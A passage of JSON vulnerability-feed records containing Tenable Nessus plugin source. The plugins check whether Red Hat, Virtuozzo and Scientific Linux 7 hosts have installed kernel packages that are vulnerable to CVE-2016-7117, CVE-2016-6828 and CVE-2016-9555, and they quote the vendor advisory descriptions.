script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:0086\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-abi-whitelists-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-devel-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-devel-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-doc-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-headers-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-devel-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-debuginfo-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-debuginfo-3.10.0-514.6.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-514.6.1.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-21T05:54:19", "references": ["https://access.redhat.com/errata/RHSA-2017-0086", "http://www.nessus.org/u?0751458e"], "pluginID": "101411", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nThese updated kernel packages include several security issues and numerous bug fixes, some of which you can see below. Space precludes documenting all of these bug fixes in this advisory. To see the complete list of bug fixes, users are directed to the related Knowledge Article: https://access.redhat.com/ articles/2857831.\n\nSecurity Fix(es) :\n\n* A use-after-free vulnerability was found in the kernel's socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function.\n(CVE-2016-7117, Important)\n\n* A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and other tcp_* functions. This condition could allow an attacker to send an incorrect selective acknowledgment to existing connections, possibly resetting a connection.\n(CVE-2016-6828, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of the SCTP protocol. A remote attacker could trigger an out-of-bounds read with an offset of up to 64kB potentially causing the system to crash.\n(CVE-2016-9555, Moderate)\n\nBug Fix(es) :\n\n* Previously, the performance of Internet Protocol over InfiniBand (IPoIB) was suboptimal due to a conflict of IPoIB with the Generic Receive Offload (GRO) infrastructure. With this update, the data cached by the IPoIB driver has been moved from a control block into the IPoIB hard header, thus avoiding the GRO problem and the corruption of IPoIB address information. As a result, the performance of IPoIB has been improved. (BZ#1390668)\n\n* Previously, when a virtual machine (VM) with PCI-Passthrough interfaces was recreated, a race condition between the eventfd daemon and the virqfd daemon occurred. Consequently, the operating system rebooted. This update fixes the race condition. As a result, the operating system no longer reboots in the described situation.\n(BZ#1391611)\n\n* Previously, a packet loss occurred when the team driver in round-robin mode was sending a large number of packets. This update fixes counting of the packets in the round-robin runner of the team driver, and the packet loss no longer occurs in the described situation. (BZ#1392023)\n\n* Previously, the virtual network devices contained in the deleted namespace could be deleted in any order. If the loopback device was not deleted as the last item, other netns devices, such as vxlan devices, could end up with dangling references to the loopback device.\nConsequently, deleting a network namespace (netns) occasionally ended by a kernel oops. With this update, the underlying source code has been fixed to ensure the correct order when deleting the virtual network devices on netns deletion. As a result, the kernel oops no longer occurs under the described circumstances. (BZ#1392024)\n\n* Previously, a Kabylake system with a Sunrise Point Platform Controller Hub (PCH) with a PCI device ID of 0xA149 showed the following warning messages during the boot :\n\n'Unknown Intel PCH (0xa149) detected.' 'Warning: Intel Kabylake processor with unknown PCH - this hardware has not undergone testing by Red Hat and might not be certified. Please consult https:/ /hardware.redhat.com for certified hardware.'\n\nThe messages were shown because this PCH was not properly recognized.\nWith this update, the problem has been fixed, and the operating system now boots without displaying the warning messages. (BZ#1392033)\n\n* Previously, the operating system occasionally became unresponsive after a long run. This was caused by a race condition between the try_to_wake_up() function and a woken up task in the core scheduler.\nWith this update, the race condition has been fixed, and the operating system no longer locks up in the described scenario. (BZ#1393719)\n\nNote that Tenable Network Security has attempted to extract the preceding description block directly from the corresponding Red Hat security advisory. Virtuozzo provides no description for VZLSA advisories. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 13, "reporter": "Tenable", "published": "2017-07-13T00:00:00", "title": "Virtuozzo 7 : kernel / kernel-abi-whitelists / kernel-debug / etc (VZLSA-2017-0086)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Virtuozzo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117", "CVE-2016-9555", "CVE-2016-6828"], "modified": "2018-11-20T00:00:00", "cpe": ["p-cpe:/a:virtuozzo:virtuozzo:kernel-tools-libs", "p-cpe:/a:virtuozzo:virtuozzo:kernel-devel", "p-cpe:/a:virtuozzo:virtuozzo:kernel-tools", "cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:kernel-headers", "p-cpe:/a:virtuozzo:virtuozzo:kernel-tools-libs-devel", "p-cpe:/a:virtuozzo:virtuozzo:kernel-abi-whitelists", "p-cpe:/a:virtuozzo:virtuozzo:kernel", "p-cpe:/a:virtuozzo:virtuozzo:kernel-debug-devel", "p-cpe:/a:virtuozzo:virtuozzo:python-perf", "p-cpe:/a:virtuozzo:virtuozzo:kernel-doc", "p-cpe:/a:virtuozzo:virtuozzo:kernel-debug", "p-cpe:/a:virtuozzo:virtuozzo:perf"], "id": "VIRTUOZZO_VZLSA-2017-0086.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=101411", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101411);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/20 11:04:17\");\n\n script_cve_id(\n \"CVE-2016-6828\",\n \"CVE-2016-7117\",\n \"CVE-2016-9555\"\n );\n\n script_name(english:\"Virtuozzo 7 : kernel / kernel-abi-whitelists / kernel-debug / etc (VZLSA-2017-0086)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated kernel packages include several security issues and\nnumerous bug fixes, some of which you can see below. Space precludes\ndocumenting all of these bug fixes in this advisory. To see the\ncomplete list of bug fixes, users are directed to the related\nKnowledge Article: https://access.redhat.com/ articles/2857831.\n\nSecurity Fix(es) :\n\n* A use-after-free vulnerability was found in the kernel's socket\nrecvmmsg subsystem. This may allow remote attackers to corrupt memory\nand may allow execution of arbitrary code. This corruption takes place\nduring the error handling routines within __sys_recvmmsg() function.\n(CVE-2016-7117, Important)\n\n* A use-after-free vulnerability was found in\ntcp_xmit_retransmit_queue and other tcp_* functions. This condition\ncould allow an attacker to send an incorrect selective acknowledgment\nto existing connections, possibly resetting a connection.\n(CVE-2016-6828, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of the SCTP\nprotocol. A remote attacker could trigger an out-of-bounds read with\nan offset of up to 64kB potentially causing the system to crash.\n(CVE-2016-9555, Moderate)\n\nBug Fix(es) :\n\n* Previously, the performance of Internet Protocol over InfiniBand\n(IPoIB) was suboptimal due to a conflict of IPoIB with the Generic\nReceive Offload (GRO) infrastructure. With this update, the data\ncached by the IPoIB driver has been moved from a control block into\nthe IPoIB hard header, thus avoiding the GRO problem and the\ncorruption of IPoIB address information. As a result, the performance\nof IPoIB has been improved. (BZ#1390668)\n\n* Previously, when a virtual machine (VM) with PCI-Passthrough\ninterfaces was recreated, a race condition between the eventfd daemon\nand the virqfd daemon occurred. Consequently, the operating system\nrebooted. This update fixes the race condition. As a result, the\noperating system no longer reboots in the described situation.\n(BZ#1391611)\n\n* Previously, a packet loss occurred when the team driver in\nround-robin mode was sending a large number of packets. This update\nfixes counting of the packets in the round-robin runner of the team\ndriver, and the packet loss no longer occurs in the described\nsituation. (BZ#1392023)\n\n* Previously, the virtual network devices contained in the deleted\nnamespace could be deleted in any order. If the loopback device was\nnot deleted as the last item, other netns devices, such as vxlan\ndevices, could end up with dangling references to the loopback device.\nConsequently, deleting a network namespace (netns) occasionally ended\nby a kernel oops. With this update, the underlying source code has\nbeen fixed to ensure the correct order when deleting the virtual\nnetwork devices on netns deletion. As a result, the kernel oops no\nlonger occurs under the described circumstances. (BZ#1392024)\n\n* Previously, a Kabylake system with a Sunrise Point Platform\nController Hub (PCH) with a PCI device ID of 0xA149 showed the\nfollowing warning messages during the boot :\n\n'Unknown Intel PCH (0xa149) detected.' 'Warning: Intel Kabylake\nprocessor with unknown PCH - this hardware has not undergone testing\nby Red Hat and might not be certified. Please consult https:/\n/hardware.redhat.com for certified hardware.'\n\nThe messages were shown because this PCH was not properly recognized.\nWith this update, the problem has been fixed, and the operating system\nnow boots without displaying the warning messages. (BZ#1392033)\n\n* Previously, the operating system occasionally became unresponsive\nafter a long run. This was caused by a race condition between the\ntry_to_wake_up() function and a woken up task in the core scheduler.\nWith this update, the race condition has been fixed, and the operating\nsystem no longer locks up in the described scenario. (BZ#1393719)\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-0086.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0751458e\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017-0086\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel / kernel-abi-whitelists / kernel-debug / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-514.6.1.vl7\",\n \"kernel-abi-whitelists-3.10.0-514.6.1.vl7\",\n \"kernel-debug-3.10.0-514.6.1.vl7\",\n \"kernel-debug-devel-3.10.0-514.6.1.vl7\",\n \"kernel-devel-3.10.0-514.6.1.vl7\",\n \"kernel-doc-3.10.0-514.6.1.vl7\",\n \"kernel-headers-3.10.0-514.6.1.vl7\",\n \"kernel-tools-3.10.0-514.6.1.vl7\",\n \"kernel-tools-libs-3.10.0-514.6.1.vl7\",\n \"kernel-tools-libs-devel-3.10.0-514.6.1.vl7\",\n \"perf-3.10.0-514.6.1.vl7\",\n \"python-perf-3.10.0-514.6.1.vl7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-7\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:42:24", "references": ["http://www.nessus.org/u?0c9770c7"], "pluginID": "96599", "description": "To see the complete list of bug fixes, users are directed to the related Knowledge Article :\n\nSecurity Fix(es) :\n\n - A use-after-free vulnerability was found in the kernel's socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function. (CVE-2016-7117, Important)\n\n - A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and other tcp_* functions.\n This condition could allow an attacker to send an incorrect selective acknowledgment to existing connections, possibly resetting a connection.\n (CVE-2016-6828, Moderate)\n\n - A flaw was found in the Linux kernel's implementation of the SCTP protocol. A remote attacker could trigger an out-of-bounds read with an offset of up to 64kB potentially causing the system to crash. (CVE-2016-9555, Moderate)\n\nBug Fix(es) :\n\n - Previously, the performance of Internet Protocol over InfiniBand (IPoIB) was suboptimal due to a conflict of IPoIB with the Generic Receive Offload (GRO) infrastructure. With this update, the data cached by the IPoIB driver has been moved from a control block into the IPoIB hard header, thus avoiding the GRO problem and the corruption of IPoIB address information. As a result, the performance of IPoIB has been improved.\n\n - Previously, when a virtual machine (VM) with PCI-Passthrough interfaces was recreated, a race condition between the eventfd daemon and the virqfd daemon occurred. Consequently, the operating system rebooted. This update fixes the race condition. As a result, the operating system no longer reboots in the described situation.\n\n - Previously, a packet loss occurred when the team driver in round-robin mode was sending a large number of packets. This update fixes counting of the packets in the round-robin runner of the team driver, and the packet loss no longer occurs in the described situation.\n\n - Previously, the virtual network devices contained in the deleted namespace could be deleted in any order. If the loopback device was not deleted as the last item, other netns devices, such as vxlan devices, could end up with dangling references to the loopback device.\n Consequently, deleting a network namespace (netns) occasionally ended by a kernel oops. With this update, the underlying source code has been fixed to ensure the correct order when deleting the virtual network devices on netns deletion. As a result, the kernel oops no longer occurs under the described circumstances.\n\n - Previously, a Kabylake system with a Sunrise Point Platform Controller Hub (PCH) with a PCI device ID of 0xA149 showed the following warning messages during the boot :\n\n'Unknown Intel PCH (0xa149) detected.' 'Warning: Intel Kabylake processor with unknown PCH - this hardware has not undergone testing ...'\n\nThe messages were shown because this PCH was not properly recognized.\nWith this update, the problem has been fixed, and the operating system now boots without displaying the warning messages.\n\n - Previously, the operating system occasionally became unresponsive after a long run. This was caused by a race condition between the try_to_wake_up() function and a woken up task in the core scheduler. With this update, the race condition has been fixed, and the operating system no longer locks up in the described scenario.", "edition": 4, "reporter": "Tenable", "published": "2017-01-18T00:00:00", "title": "Scientific Linux Security Update : kernel on SL7.x x86_64", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117", "CVE-2016-9555", "CVE-2016-6828"], "modified": "2017-01-18T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20170117_KERNEL_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=96599", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96599);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2017/01/18 14:49:21 $\");\n\n script_cve_id(\"CVE-2016-6828\", \"CVE-2016-7117\", \"CVE-2016-9555\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL7.x x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"To see the complete list of bug fixes, users are directed to the\nrelated Knowledge Article :\n\nSecurity Fix(es) :\n\n - A use-after-free vulnerability was found in the kernel's\n socket recvmmsg subsystem. This may allow remote\n attackers to corrupt memory and may allow execution of\n arbitrary code. This corruption takes place during the\n error handling routines within __sys_recvmmsg()\n function. (CVE-2016-7117, Important)\n\n - A use-after-free vulnerability was found in\n tcp_xmit_retransmit_queue and other tcp_* functions.\n This condition could allow an attacker to send an\n incorrect selective acknowledgment to existing\n connections, possibly resetting a connection.\n (CVE-2016-6828, Moderate)\n\n - A flaw was found in the Linux kernel's implementation of\n the SCTP protocol. A remote attacker could trigger an\n out-of-bounds read with an offset of up to 64kB\n potentially causing the system to crash. (CVE-2016-9555,\n Moderate)\n\nBug Fix(es) :\n\n - Previously, the performance of Internet Protocol over\n InfiniBand (IPoIB) was suboptimal due to a conflict of\n IPoIB with the Generic Receive Offload (GRO)\n infrastructure. With this update, the data cached by the\n IPoIB driver has been moved from a control block into\n the IPoIB hard header, thus avoiding the 